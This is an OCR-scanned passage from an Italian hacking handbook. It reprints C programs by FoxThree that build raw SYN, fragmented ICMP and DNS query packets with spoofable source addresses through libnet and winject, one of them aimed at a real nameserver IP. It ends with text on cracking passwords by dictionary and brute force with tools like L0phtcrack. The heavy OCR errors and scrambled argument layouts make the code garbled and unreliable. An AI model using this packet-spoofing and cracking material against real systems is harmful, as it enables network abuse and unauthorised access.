unsigned char packet [1514] ; 
char c ; 

int nPackets = 3 ; 
SOCKET sock ; 
struct sockaddr_in dest ; 
char szBuffer [255] ; 

/* Initialize */ 
src_ip = 0 ; 
dst_ip = 0 ; 

/* Initialize the Libnet NT Library */ 
libnet_win32_init (1) ; 

/* Initialize our Windows Sockets */ 

if (! InitWinSock () ) 

{ 

printf ("syn: Oops! Unable to init Windows Sockets. Can't 
proceed further!\n") ; 

exit (-1) ; 

} 

/* Print out header */ 
PrintHeader () ; 

/* Parse our command line parameters */ 
while((c = getopt(argc, argv, "s :d:n: ") ) != EOF) 
( 

switch (c) 
( 

/* Destination host; it can be of the forni www.yahoo.com 

or */ 

/* 202.140.152.1 etc. */ 
case 'd': 

if ( ! (dst_ip = libnet_name_resolve ( (unsigned char 

*)optarg, 1) ) ) 

( 

f print f (stderr, "Bad destination IP address: 
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exlt(-l); 

ì 

break; 
case ' s ' : 

if (!(src_ip = libnet_name_resolve ( (unsigned char 

*)optarg, 1) ) ) 

{ 

fprlntf (stderr, "Bad source IP address : 

%s\n", optarg) ; 

exit (-1) ; 

} 

break ; 

case ' n ' : 

nPackets = atoi (optarg) ; 
break ; 

} 

ì 

/* If the user has not opted to give the source address, attempt to 
retrieve it */ 

/* ourself */ 
if (!src_ip) 
{ 

/* Get our locai host name */ 

if (gethostname (szBuffer, sizeof (szBuffer) ) == SOCKET_ERROR) 
{ 

printf ("syn: Error getting locai host name\n") ; 
exit (-1) ; 

} 

/* Attempt to get our IP Address */ 

struct hostent *phe = gethostbyname (szBuffer) ; 

if (phe == 0) 
{ 

printf ("syn: Error getting locai IP Address . Try giving 
as a -s option . \n ") ; 

exit (-1) ; 

} 

struct in_addr addr; 
memcpy (Saddr, phe->h_addr_list [0] , sizeof (struct in_addr) ) ; 

/* Get our IP Address, atlast! */ 
src_ip = addr . S_un . S_addr ; 

} 



/* Sanity check ! */ 
if ( ! src_ip II !dst_ip) 
{ 

PrintUsage () ; 
exit (-1) ; 

) 



/* Size of the payload 
/* 

/* IP ID */ 

/* Frag stuff */ 

/* TTL */ 

/* Transport 



/* Build our IP Packet */ 
libnet_build_ip ( LIBNET_ TCP_H, 

*/ 

0, 

IP tos */ 

Ir 
Or 

64, 

IPPROTO_TCP, 

protocol */ 
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payload (none) */ 

Length of payload */ 

Packet header memory */ 

/* Build our TCP Packet */ 
l±bnet_bu±ld_tcp (1024, 

Destlnatlon Port */ 

Sequence Number */ 

Acknowledgement Number */ 

SYN Flag */ 

Wlndow slze */ 

URG Pointer */ 

*/ 

Payload slze */ 



dst_ip, 
NULL, 

0, 

packet) 



80, 

0, 

0, 

TH_SYN, 

0, 

0, 

NULL, 
0, 



/* Destlnatlon IP */ 
/* Pointer to 

/* 
/* 



/* Source Port */ 
/* 

/* 
/* 

/* Set the 
/* 
/* 

/* Payload 
/* 



packet + LIBNET_IP_H) ; /* Packet buffer */ 



/* Do our checksums */ 

if (libnet_do_checksum (packet, IPPROTO_TCP, LIBNET_TCP_H) == -1) 
{ 

} 



fprintf (stderr, "Can't do TCP checksum! \n") ; 



if (libnet_do_checksum (packet, IPPROTO_IP, LIBNET_ IP_H) == -1) 
{ 

fprintf (stderr, "Can't do IP checksum! \n" ) ; 



/* Open our wlnject Winsock extension interface */ 
sock = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP) ; 

/* Se the TTL value of outgoing packet to zero */ 
int ttl = 0 ; 

set sockopt (sock, IPPROTO_IP, IP_TTL, (char *) itti, sizeof (ttl) ) ; 

/* Set our destlnatlon parameters */ 
dest.sin_addr.s_addr = inet_addr ("200 .200 .200 .200" ) ; 
dest . sin_family = AF_INET ; 

dest.sin _port = htons (0) ; 

printf ("Injecting %d TCP_SYN Packet (s) into the network ... \n" , 
nPackets) ; 

/* Fire away our packet in the data payload of a UDP packet */ 
/* wlnject takes care of the rest */ 
for (int i = 0; 1 < nPackets; 1++) 

sendtofsock, (char *)packet, (LIBNET_IP_H + LIBNET_TCP_H) , 0, 
(struct sockaddr*) Sdest, sizeof (dest) ) ; 

printf ("Done. . . \n") ; 

/* Close our socket */ 
closesocket (sock) ; 

/* Clean up WinSock */ 
WSACleanupO ; 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



return 0 ; 

} 

/* Inltlallze Windows Sockets version 2.2 */ 

int InltWlnSock (void) 

{ 

WORD wVersionRequested; 
WS ADATA wsaData; 

wVersionRequested = MAKEWORD (2, 2); 

if (WSAStartup (wVersionRequested, SwsaData) ) 

{ 

fprintf (stderr, "Errori Unable to find a useable 
winsock .dll!\n ") ; 

return 0; 

} 

if (LOBYTE (wsaData. wVersion) != 2 II HIBYTE (wsaData . wVersion) != 2) 
< 

fprintf (stderr, "Errori Unable to find a 2.2 compatible version 
of winsock ! \n ") ; 

WSACleanup () ; 
return 0; 

} 

return 1; 

} 

Il programma che segue invece implementa funzioni d frammentazione dei pacchetti tramite 
Wininject. 

/* 

* Fragl . cpp 
* 

* - Implements Fragmented Packet functionality through wlnject 
* 

* Make sure : 
* 

* - wlnject 0 . 95b is running 
* 

* Authori FoxThree (foxthree@antionline.org) 
* 

* Redistribution and use in source and binary forms, with or without 

* modification, are permitted provided that the following conditions 

* are met i 

* 1 . Redistributions of source code must retain the above copyright 

* notice, this list of conditions and the following disclaimer. 

* 2. Redistributions in binary fonti must reproduce the above copyright 

* notice, this list of conditions and the following disclaimer in the 

* documentation and/or other materials provided with the distribution . 
* 

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS 1 "AS IS ' ' AND 

* ANY EXPRESS OR IMPLIED WARRANT IES , INCLUDING, BUT NOT LIMITED TO, THE 

* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
PURPOSE 

* ARE DISCLAIMED . IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 

* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL 

* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 

* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 

* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 
STRICT 

* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 

* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 

* SUCH DAMAGE. 
* 

*/ 
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^include "stdafx.h" 
^include " . . \getopt . h " 
^include <llbnet . h> 

/* tfdefines for the application */ 
Itdefine VERSION "1.0" 

/* Function prototypes */ 
int InitWinSock (void) ; 

/* Prints a small header */ 

void PrintHeader () 

{ 

printf ("Fragl %s - Send a Fragmented packet to a host via wlnject\n" , 
VERSION) ; 

printf ("by foxthree (foxthree@antionline.org)\n\n") ; 

} 

/* Prints the Usage */ 

void PrintUsage () 

{ 

printf ("usage: fragl [-n numpackets] [-s src host] [-d dst 
host] \n\nMake sure wlnject is running! ! ! \n\n" ) ; 
} 

/* Hmmm. . . what can this be ?! */ 
int main(int argo, char* argv[]) 
{ 

unsigned long src_ip, dst_ip; 
unsigned char packet [1514] ; 
char c ; 

int nPackets = 3 ; 
SOCKET sock ; 
struct sockaddr_in dest ; 
char szBuffer [255] ; 

/* Initialize */ 
src_ip = 0 ; 
dst_ip = 0 ; 

/* Initialize the Libnet NT Library */ 
libnet_win32_init (1) ; 

/* Initialize our Windows Sockets */ 

if (! InitWinSock () ) 

{ 

printf ("Fragl: Oops ! Unable to init Windows Sockets. Can't 
proceed further!\n") ; 

exit (-1) ; 

} 

/* Print out header */ 
PrintHeader () ; 

/* Parse our command line parameters */ 
while((c = getoptfargc, argv, "s :d:n: ") ) != EOF) 
{ 

switch (c) 
{ 

/* Destination host; it can be of the forni www.yahoo.com 

or */ 

/* 202.140.152.1 etc. */ 
case 'd': 

if ( ! (dst_ip = libnet_name_resolve ( (unsigned char 

*)optarg r 1) ) ) 
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fprintf (stderr, "Bad destination IP address : 

%s\n", optarg) ; 

exit(-l); 

ì 

break; 
's ' : 

if (!(src_ip = libnet_name_resolve ( (unsigned char 
{ 

fprintf (stderr, "Bad source IP address: 
exit (-1) ; 

} 

break ; 

case ' n ' : 

nPackets = atoi (optarg) ; 
break ; 

} 

ì 

/* If the user has not opted to give the source address, attempt to 
retrieve it */ 

/* ourself */ 
if (!src_ip) 
{ 

/* Get our locai host name */ 

if (gethostname (szBuffer, sizeof (szBuffer) ) == SOCKET_ERROR) 
{ 

printf ("Fragl: Error getting locai host name\n") ; 
exit (-1) ; 

} 

/* Attempt to get our IP Address */ 

struct hostent *phe = gethostbyname (szBuffer) ; 

if (phe == 0) 
{ 

printf ("Fragl: Error getting locai IP Address . Try 
giving as a -s option. \n") ; 

exit (-1) ; 

} 

struct in_addr addr; 
memcpy (Saddr, phe->h_addr_list [0] , sizeof (struct in_addr) ) ; 

/* Get our IP Address, atlast! */ 
src_ip = addr . S_un . S_addr ; 

} 

/* Sanity check ! */ 
if ( ! src_ip II !dst_ip) 
{ 

PrintUsage () ; 
exit (-1) ; 



/* Set the more to come flag */ 
int flags = IP_MF; 
int offset = 0 ; 



case 

*) optarg, 1) ) ) 
%s\n", optarg) ; 



/* Build our IP Packet */ 

libnet_build_ip(LIBNET_ICMP_ECHO_H, /* Size of the payload */ 

0, /* 

IP tos */ 
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(flags I (offset » 3)),/* Frag stuff */ 



protocol */ 

payload (none) */ 
Length of payload */ 
Packet header memory */ 



64, 

IPPROTO_ICMP , 

src_lp, 
dst_lp, 
NULL, 

0, 

packet) 



/* TTL */ 
/* Transport 

/* Source IP */ 

/* Destlnatlon IP */ 

/* Pointer to 

/* 
/* 



/* Bulld the ICMP header */ 
libnet_build_icmp_echo (ICMP_ECHO, 
/* type */ 

0, 

/* code */ 

1, 

/* Id */ 

Or 

/* seq */ 

(unsigned char *) "DEADBEEF " , 

/* pointer to payload */ 

strlen ( "DEADBEEF ") , 
/* slze of payload */ 

packet + LIBNET_IP_H) ; 
/* packet header memory */ 

/* Do our checksums */ 

if (libnet_do_checksum (packet, IPPROTO_ICMP, LIBNET_ICMP_ECHO_H) == - 



1) 



fprintf (stderr, "Can't do ICMP checksum! \n" ) ; 



If (llbnet_do_checksum (packet , IPPROTO_IP, LIBNET_IP_H) == -1) 
{ 

fprintf (stderr, "Can't do IP checksum! \n") ; 



/* Open our wlnject Winsock extension interface */ 
SOCk = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP) ; 

/* Se the TTL value of outgoing packet to zero */ 
int ttl = 0 ; 

set sockopt ( sock, IPPROTO_IP, IP_TTL, (char *) «ttl, sizeof (ttl) ) ; 

/* Set our destlnatlon parameters */ 
dest . sin_addr . s_addr = inet_addr ("200 .200 .200 .200") ; 
dest . sln_famlly = AF_INET ; 

dest. sin __port = htons (0) ; 

printf ("Injectlng %d FRAGMENTED Packet (s) into the network ... \n" , 
nPackets) ; 

/* Fire away our packet in the data payload of a UDP packet */ 
/* wlnject takes care of the rest */ 
for (int i = 0; 1 < nPackets; 1++) 

sendto(sock, (char *)packet, 36, 0, (struct sockaddr*) Sdest, 
sizeof (dest) ) ; 

printf ("Done. . . \n") ; 

/* Close our socket */ 
closesocket (sock) ; 
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WSACleanupO ; 
return 0; 

} 

/* Inltlallze Windows Sockets verslon 2.2 */ 

int InltWlnSock (vold) 

{ 

WORD wVerslonRequested; 
WS ADATA wsaData; 

wVerslonRequested = MAKEWORD (2, 2); 

if (WSAStartup (wVerslonRequested, &wsaData) ) 

{ 

fprintf (stderr, "Errori Unable to flnd a useable 
wlnsock .dll!\n ") ; 

return 0; 

} 

If (LOBYTE (wsaData. wVersion) != 2 II HIBYTE (wsaData . wVersion) != 2) 
{ 

fprintf (stderr , "Error: Unable to find a 2.2 compatible version 
of winsock ! \n ") ; 

WSACleanup () ; 
return 0; 

} 

return 1; 



Un altro metodo per l'implementazione di pacchetti frammentati. 
/* 

* Frag2 . cpp 
* 

* - Implements Fragmented Packet functionality through wlnject 
* 

* Make sure : 
* 

* - wlnject 0 . 95b is running 
* 

* Author: FoxThree (foxthree@antionline.org) 
* 

* Redistribution and use in source and binary forms, with or without 

* modification, are permitted provided that the following conditions 

* are met : 

* 1 . Redistributions of source code must retain the above copyright 

* notice, this list of conditions and the following disclaimer . 

* 2. Redistributions in binary fonti must reproduce the above copyright 

* notice, this list of conditions and the following disclaimer in the 

* documentation and/or other materials provided with the distribution . 
* 

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS 1 ~AS IS ' ' AND 

* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 

* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
PURPOSE 

* ARE DISCLAIMED . IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 

* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL 

* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 

* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 

* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 
STRICT 

* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 

* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 

* SUCH DAMAGE. 



* 
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^include "stdafx.h" 
^include " . . \getopt . h " 
^include <llbnet . h> 

/* tfdefines for the application */ 
Itdefine VERSION "1.0" 

/* Function prototypes */ 
int InitWinSock (void) ; 

/* Prints a small header */ 

void PrintHeader () 

{ 

printf ("Frag2 %s - Send a Fragmented packet to a host via wlnject\n" , 
VERSION) ; 

printf ("by foxthree (foxthree@antionline.org)\n\n") ; 

} 

/* Prints the Usage */ 

void PrintUsage () 

{ 

printf ("usage: frag2 [-n numpackets] [-s src host] [-d dst 
host] \n\nMake sure wlnject is running! ! ! \n\n" ) ; 
} 

/* Hmmm. . . what can this be ?! */ 
int main(int argo, char* argv[]) 
{ 

unsigned long src_ip, dst_ip; 
unsigned char packet [1514] ; 
char c ; 

int nPackets = 3 ; 
SOCKET sock ; 
struct sockaddr_in dest ; 
char szBuffer [255] ; 

/* Initialize */ 
src_ip = 0 ; 
dst_ip = 0 ; 

/* Initialize the Libnet NT Library */ 
libnet_win32_init (1) ; 

/* Initialize our Windows Sockets */ 

if (! InitWinSock () ) 

{ 

printf ("Frag2: Oops ! Unable to init Windows Sockets. Can't 
proceed further!\n") ; 

exit (-1) ; 

} 

/* Print out header */ 
PrintHeader () ; 

/* Parse our command line parameters */ 
while((c = getopt(argc, argv, "s :d:n: ") ) != EOF) 
{ 

switch (c) 
{ 

/* Destination host; it can be of the forni www.yahoo.com 

or */ 

/* 202.140.152.1 etc. */ 
case 'd': 

if ( ! (dst_ip = libnet_name_resolve ( (unsigned char 

*)optarg r 1) ) ) 
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fprintf (stderr, "Bad destination IP address : 

%s\n", optarg) ; 

exit(-l); 

ì 

break; 
's ' : 

if (!(src_ip = libnet_name_resolve ( (unsigned char 
{ 

fprintf (stderr, "Bad source IP address: 
exit (-1) ; 

} 

break ; 

case ' n ' : 

nPackets = atoi (optarg) ; 
break ; 

} 

ì 

/* If the user has not opted to give the source address, attempt to 
retrieve it */ 

/* ourself */ 
if (!src_ip) 
{ 

/* Get our locai host name */ 

if (gethostname (szBuffer, sizeof (szBuffer) ) == SOCKET_ERROR) 
{ 

printf ("Frag2: Error getting locai host name\n") ; 
exit (-1) ; 

} 

/* Attempt to get our IP Address */ 

struct hostent *phe = gethostbyname (szBuffer) ; 

if (phe == 0) 
{ 

printf ("Frag2: Error getting locai IP Address . Try 
giving as a -s option. \n") ; 

exit (-1) ; 

} 

struct in_addr addr; 
memcpy (Saddr, phe->h_addr_list [0] , sizeof (struct in_addr) ) ; 

/* Get our IP Address, atlast! */ 
src_ip = addr . S_un . S_addr ; 

} 

/* Sanity check ! */ 
if ( ! src_ip II !dst_ip) 
{ 

PrintUsage () ; 
exit (-1) ; 



/* Set the more to come flag */ 
int flags = 0; 
int offset = 16 ; 



case 

*) optarg, 1) ) ) 
%s\n", optarg) ; 



/* Build our IP Packet */ 

libnet_build_ip(LIBNET_ICMP_ECHO_H, /* Size of the payload */ 

0, /* 

IP tos */ 
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(flags I (offset » 3)),/* Frag stuff */ 



protocol */ 

payload (none) */ 
Length of payload */ 
Packet header memory */ 



64, 

IPPROTO_ICMP , 

src_lp, 
dst_lp, 
NULL, 

0, 

packet) 



/* TTL */ 
/* Transport 

/* Source IP */ 

/* Destination IP */ 

/* Pointer to 

/* 
/* 



/* Bulld the ICMP header */ 
libnet_build_icmp_echo (ICMP_ECHO, 
/* type */ 

0, 

/* code */ 

1, 

/* Id */ 

Or 

/* seq */ 

(unsigned char *) "DEADBEEF " , 

/* pointer to payload */ 

strlen ( "DEADBEEF ") , 
/* slze of payload */ 

packet + LIBNET_IP_H) ; 
/* packet header memory */ 

/* Do our checksums */ 

if (llbnet_do_checksum (packet, IPPROTO_ICMP, LIBNET_ICMP_ECHO_H) == - 



1) 



fprintf (stderr, "Can't do ICMP checksum! \n" ) ; 



If (llbnet_do_checksum (packet , IPPROTO_IP, LIBNET_IP_H) == -1) 
{ 

fprintf (stderr, "Can't do IP checksum! \n") ; 



/* Open our wlnject Winsock extension interface */ 
SOCk = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP) ; 

/* Se the TTL value of outgoing packet to zero */ 
int ttl = 0 ; 

set sockopt ( sock, IPPROTO_IP, IP_TTL, (char *) «ttl, sizeof (ttl) ) ; 

/* Set our destination parameters */ 
dest.sin_addr.s_addr = inet_addr ("200 .200 .200 .200") ; 
dest . sin_family = AF_INET ; 

dest . sin __port = htons (0) ; 

printf ("Injecting %d FRAGMENTED Packet (s) into the network ... \n" , 
nPackets) ; 

/* Fire away our packet in the data payload of a UDP packet */ 
/* wlnject takes care of the rest */ 
for (int i = 0; i < nPackets; i++) 

sendto(sock, (char *)packet, 36, 0, (struct sockaddr*) Sdest, 
sizeof (dest) ) ; 

printf ("Done. . . \n") ; 

/* Close our socket */ 
closesocket (sock) ; 
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WSACleanupf) ; 
return 0; 



} 



/* Inltlallze Windows Sockets verslon 2.2 */ 

int InltWlnSock (vold) 

{ 

WORD wVerslonRequested; 
WS ADATA wsaData; 

wVerslonRequested = MAKEWORD (2, 2); 

if (WSAStartup (wVerslonRequested, &wsaData) ) 

{ 

fprintf (stderr, "Errori Unable to flnd a useable 
wlnsock .dll!\n ") ; 

return 0; 

} 

If (LOBYTE (wsaData. wVersion) != 2 II HIBYTE (wsaData . wVersion) != 2) 
{ 

fprintf (stderr, "Error: Unable to find a 2.2 compatible version 
of winsock ! \n ") ; 

WSACleanup () ; 
return 0; 

} 

return 1; 



Il sorgente che segue invece implementa pacchetti DNS sempre tramite wlnject. 
/* 

* DNS_Q.cpp 
* 

* - Implements DNS Query Packet functionality through wlnject 

* - We will be querying for www.yahoo.com at the NS host 194.239.134.83 
(ns3.tele.dk) 

* 

* Make sure : 
* 

* - wlnject 0 . 95b Is runnlng 
* 

* Author: FoxThree (foxthree@antionline.org) 
* 

* Redistribution and use in source and binary forms, with or without 

* modification, are permitted provided that the following conditions 

* are met : 

* 1 . Redistributions of source code must retain the above copyright 

* notice, this list of conditions and the following disclaimer. 

* 2. Redistributions in binary form must reproduce the above copyright 

* notice, this list of conditions and the following disclaimer in the 

* documentation and/or other materials provided with the distribution . 
* 

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS 1 ~AS IS ' ' AND 

* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 

* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
PURPOSE 

* ARE DISCLAIMED . IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 

* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL 

* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 

* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 

* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 
STRICT 

* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 

* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 
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* 

V 

^include "stdafx.h" 

^include " . . \getopt . h " 

^include <llbnet . h> 

/* #deflnes for the application */ 
#define VERSION "1.0" 

/* Function prototypes */ 
int InitWinSock (void) ; 

/* Prints a small header */ 

void PrintHeader () 

{ 

printf ("dns_q %s - Send a DNS Query packet to a NS host via 
wlnject\n", VERSION) ; 

printf ("by foxthree (foxthree@antionline.org)\n\n") ; 

} 

/* Prints the Usage */ 

void PrintUsage () 

{ 

printf ("usage: dns_q [-n numpackets] [-s src host] \n\nMake sure 
wlnject is running! ! ! \n\n" ) ; 
} 

/* Hmmm. . . what can this be ?! */ 
int mainfint argc, char* argv[]) 
{ 

unsigned long src_ip, dst_ip; 
unsigned char packet [1514] ; 
char c ; 

int nPackets = 3 ; 
SOCKET sock ; 
struct sockaddr_in dest ; 
char szBuffer [255] ; 

unsigned char payload[] = {0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x00, 
0x00, 0x00, 

0x00, 0x00, 0x00, 0x03, 

0x77, 0x77, 0x77, 0x05, 0x79, 

0x61, 0x68, 0x6F, 0x6F, 

0x03, 0x63, 0x6F, 0x6D, 0x00, 

0x00, 0x01, 0x00, 0x01 } ; 

int payload_s = 31 ; 

/* Initialize */ 
src_ip = 0 ; 
dst_ip = 0 ; 

/* Initialize the Libnet NT Library */ 
libnet_win32_init (1) ; 

/* Initialize our Windows Sockets */ 

if (! InitWinSock () ) 

{ 

printf ("dns_q: Oops! Unable to init Windows Sockets. Can't 
proceed further!\n") ; 

exit (-1) ; 

} 

/* Print out header */ 
PrintHeader () ; 

/* Parse our command line parameters */ 
while((c = getoptfargc, argv, "d:n:")) != EOF) 
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swltch (c) 
{ 

/* Destlnatlon host; it can be of the fona www.yahoo.com 

or */ 

/* 202.140.152.1 etc. */ 
case ' s ' : 

if (!(src_ip = libnet_name_resolve ( (unsigned char 

*) optarg, 1) ) ) 

{ 

fprlntf (stderr, "Bad source IP address : 

%s \n ", optarg) ; 

exit (-1) ; 

} 

break ; 

case ' n ' : 

nPackets = atoi (optarg) ; 
break ; 

} 

ì 

/* If the user has not opted to glve the source address, attempt to 
retrieve it */ 

/* ourself */ 
if (!src_ip) 
{ 

/* Get our locai host name */ 

if (gethostname (szBuffer, sizeof (szBuffer) ) == SOCKET_ERROR) 
{ 

printf ("dns_q: Error getting locai host name\n" ) 
exit (-1) ; 

} 

/* Attempt to get our IP Address */ 

struct hostent *phe = gethostbyname (szBuffer) ; 

if (phe == 0) 
{ 

printf ("dns_q: Error getting locai IP Address . Try 
giving as a -s option. \n") ; 

exit (-1) ; 

} 

struct in_addr addr; 
memcpy (Saddr, phe->h_addr_list [0] , sizeof (struct in_addr) ) ; 

/* Get our IP Address, atlast! */ 
src_ip = addr . S_un . S_addr ; 

} 

if (!(dst_ip = libnet_name_resolve ( (unsigned char *) "194 .239 .134 .83" 

1))) 

{ 

f printf (stderr , "Bad Name Server IP address\n") ; 
exit (-1) ; 

; 

/* Sanity check ! */ 
if ( ! src_ip II !dst_ip) 
{ 

PrintUsage () ; 
exit (-1) ; 



/* Build our IP Packet */ 

libnet_build_ip (LIBNET_UDP_H + payload_s, /* Size of the 
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IP tos */ 
Frag stuff */ 
protocol */ 

payload (none) */ 

Length of payload */ 

Packet header memory */ 

/* Build our UDP Packet */ 
llbnet_bulld_udp (1035, 

Destlnatlon Port */ 

*/ 

of payload */ 
assemble */ 



0, 

0x5 aOO, 
0, 

32, 

IPPROTO_UDP, 

src_lp, 
dst_lp, 
NULL, 

0, 

packet) 



/* IP ID */ 



/* 
/* 



53, 

payload, 
payload_s , 

packet + LIBNET_IP_H) ; 



/* TTL */ 

/* Transport 

/* Source IP */ 

/* Destlnatlon IP */ 

/* Pointer to 

/* 
/* 



/* Source Port */ 
/* 

/* Payload 
/* Length 
/* Where to 



/* Do our checksums */ 

if (libnet_do_checksum (packet, IPPROTO_UDP, LIBNET_UDP_H + payload_s) 



== -1) 



fprintf (stderr, "Can't do UDP checksum! \n" ) ; 



If (llbnet_do_checksum (packet, IPPROTO_IP, LIBNET_IP_H) == -1) 
{ 

fprintf (stderr, "Can't do IP checksum! \n" ) ; 



/* Open our wlnject Winsock extenslon interface */ 
SOCk = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP) ; 

/* Se the TTL value of outgoing packet to zero */ 
int ttl = 0 ; 

setsockopt (sock, IPPROTO_IP, IP_TTL, (char *) itti, sizeof (ttl) ) ; 

/* Set our destlnatlon parameters */ 
dest.sin_addr.s_addr = lnet_addr ("200 .200 .200 .200") ; 
dest . sln_famlly = AF_INET ; 

dest.sin _port = htons (0) ; 

prlntf ("Injectlng %d FRAGMENTED Packet (s) into the network ... \n" , 
nPackets) ; 

/* Flre away our packet in the data payload of a UDP packet */ 
/* wlnject takes care of the rest */ 
for (int 1 = 0; 1 < nPackets; i++) 

sendtofsock, (char *)packet, 59, 0, (struct sockaddr*) &dest , 
sizeof (dest) ) ; 



prlntf ("Done. . . \n") ; 

/* Close our socket */ 
closesocket (sock) ; 

/* Clean up WinSock */ 
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return 0; 

} 

/* Initiallze Windows Sockets version 2.2 */ 

int InitWinSock (void) 

{ 

WORD wVersionRequested; 
WS ADATA wsaData; 

wVersionRequested = MAKEWORD (2, 2); 

if (WSAStartup (wVersionRequested, SwsaData) ) 

{ 

fprintf (stderr, "Error: Unable to find a useable 
winsock .dll!\n ") ; 

return 0; 

} 

if (LOBYTE (wsaData. wVersion) != 2 II HIBYTE (wsaData .wVersion) != 2) 
{ 

fprintf (stderr, "Error: Unable to find a 2.2 compatible version 
of winsock ! \n ") ; 

WSACleanup () ; 
return 0; 

} 
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1 1 cracking delle passwords 

Il sistema relativo alla gestione delle passwords in ambiente Windows è stato parzialmente 
discusso nei capitoli in cui si parla della sicurezza e dell'enumerazione legata a questo 
sistema operativo. 

L'individuazione delle passwords è una delle attività fondamentali a qualsiasi livello legate alla 
sicurezza dei sistemi informatici. 

In altre parole le passwords sono di fatto il metodo per proteggere qualsiasi cosa a partire da 

un semplice router, uno switch o un accesso ad un sistema operativo. 

In un altro capitolo abbiamo riportato una lista di passwords di default che spesso a causa 

dell'ignoranza del system administrator non vengono modificate per cui accedere ad un 

dispositivo di qualsiasi tipo potrebbe essere più semplice di quanto si pensa. 

Sotto sistemi operativi come ad esempio Unix questa attività diventa una di quelle 

fondamentali per cui capire le possibilità che ci sono sulla rete per crackarle è di fatto una 

delle cose fondamentali. 

Il settore delle password implica nell'ambito dell'ahcking quella che viene definita ingegneria 
sociale in quanto l'individuazione di queste spesso dipende dallo studio degli individui che le 
settano. 



Gli utenti tendono a scegliere delle passwords semplici da ricordare. 

Se gli utenti sono portati a scegliere passwords difficili da ricordare tendono a scriverle da 

qualche parte. La soluzione prevede l'uso di software in grado di generare passwords 

difficili ma allo stesso tempo semplici da ricordare. 

Le passwords sono suscettibili ad un attacco di sniffing. 

I files che contengono le passwords sono a volte accessibili e quindi decrittabili 
utilizzando strumenti sviluppati ad hoc (NTCrack, LC). 

La soluzione potrebbe essere quella di utilizzare uno schema di password resistente, a 



In genere si pensa che individuare le password di Unix si un attività semplice. 

Nulla di più sbagliato in quanto le password in questo ambiente vengono mantenute 

crtptografate. 

Quando al login inserite la password d'accesso il sistema la encrypta e la confronta con 
quella mantenuta memorizzata come tale. 

Esistono in circolazione diversi programmi che cercano di decodificare la passwords usando 
metodi differenti. 

Un metodo, come abbiamo già detto in altri capitoli, utilizza dei dizionari di parole già creati 

mentre il secondo metodo genera le combinazioni usando i set di caratteri specificati. 

Il tempo di generazione legato a questo ultimo metodo può essere anche esageratamente 

grosso. 

Se si selezionano tutti caratteri, minuscoli e maiuscoli, e tutti numeri il numero delle 
combinazioni possibili per cercare di individuare un password di soli 8 caratteri è enorme. 
Alcuni software come lOphtcrack, no dei più famosi, possiedono diversi metodi per riuscire a 
decodificare le passwords di sistema. 

Oltre ai due di cui abbiamo parlato ne esiste uno aggiuntivo che scaturisce dallo sniffing di 
rete. 

Una delle versioni più recenti per ambiente Windows oltre a disporre di tuti questi metodi è di 
fatto anche molto veloce e in ambito della ricerca basata sulla forza bruta, quella combinatori, 
riesce ad eseguire migliaia di combinazioni al secondo. 

Sulla rete è possibile trovare qualsiasi vocabolario basato sulla lingua inglese, su quella 
italiana oppure è anche possibile trovare dei generatori i quali creano dei files .txt. 
Prima di avventurarci in un tipo di hacking in cui il metodo prevede i tentaivi ondine 
ricordiamoci quello che segue : 

1 . I tentativi di accessi vengono quasi sicuramente logati per cui un programma che tenta di 
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2. Il sistema potrebbe non permettere l'accesso da sistema remoto a livelli elevati, come nel 
caso di Unix a livello di root. 

3. Il sistema potrebbe essere un honeypot in quanto generalmente un amministratore serio 
disabilita almeno l'accesso ramite TELNET al server. 

4. Il sistema potrebbe disabilitare l'accesso dopo un certo numero di tentivi errati. Windows 
